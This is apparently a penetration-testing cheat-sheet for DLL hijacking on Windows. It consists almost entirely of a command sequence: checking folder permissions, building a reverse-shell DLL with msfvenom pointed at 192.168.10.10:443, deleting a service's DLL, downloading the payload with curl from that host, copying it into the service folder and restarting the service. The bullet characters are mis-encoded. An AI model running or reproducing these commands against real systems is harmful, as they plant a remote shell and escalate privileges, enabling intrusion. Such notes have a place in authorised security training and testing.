DLL Hijacking
β’ icacls "C:\Program Files"
β’ msfvenom -p windows/shell_reverse_tcp lhost=192.168.10.10 lport=443 -f dll -o rev.dll
β’ del "C:\program files\noman\noman.dll"
β’ curl 192.168.10.10/rev.dll -o noman.dll
β’ cp noman.dll "C:\program files\noman\"
β’ net start nomanLast updated